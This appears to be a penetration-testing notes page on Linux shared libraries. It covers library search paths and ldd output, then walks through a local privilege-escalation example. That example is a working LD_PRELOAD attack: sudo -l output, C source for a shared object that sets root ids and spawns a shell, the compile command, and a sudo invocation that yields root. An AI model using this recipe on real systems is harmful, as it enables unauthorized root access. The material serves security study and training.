Shared Libraries
2 types of library in linux
Static libraries (ends in .a extension)
Dynamically linked shared object libraries (.so extension)
Methods of specifying the location of dynamic libraries
-rpathor-rpath-linkflags when compiling a programusing the environmental variables
LD_RUN_PATHorLD_LIBRARY_PATHplacing libraries in the
/libor/usr/libdefault directoriesspecifying another directory containing the libraries within the
/etc/ld.so.confconfiguration fileLD_PRELOADenvirontment variable
Viewing the shared objects required by a binary
$ ldd /bin/ls
linux-vdso.so.1 => (0x00007fff03bc7000)
libselinux.so.1 => /lib/x86_64-linux-gnu/libselinux.so.1 (0x00007f4186288000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f4185ebe000)
libpcre.so.3 => /lib/x86_64-linux-gnu/libpcre.so.3 (0x00007f4185c4e000)
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f4185a4a000)
/lib64/ld-linux-x86-64.so.2 (0x00007f41864aa000)
libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f418582d000)Sample Exploitation
Use
sudo -lto check the LD_PRELOAD$ sudo -l Matching Defaults entries for daniel.carter on NIX02: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_PRELOAD User daniel.carter may run the following commands on NIX02: (root) NOPASSWD: /usr/sbin/apache2 restartUnder normal circumstances, apache2 is NOT included in the GTFObins so we can't use it for privilege escalation. However, since LD_PRELOAD is enabled, we can exploit this.
Create a root.c file
#include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/bash"); }Compile the root.c
$ gcc -fPIC -shared -o root.so root.c -nostartfilesRun the apache2 as sudo and include the root.so in the LD_PRELOAD
$ sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart id uid=0(root) gid=0(root) groups=0(root)
Last updated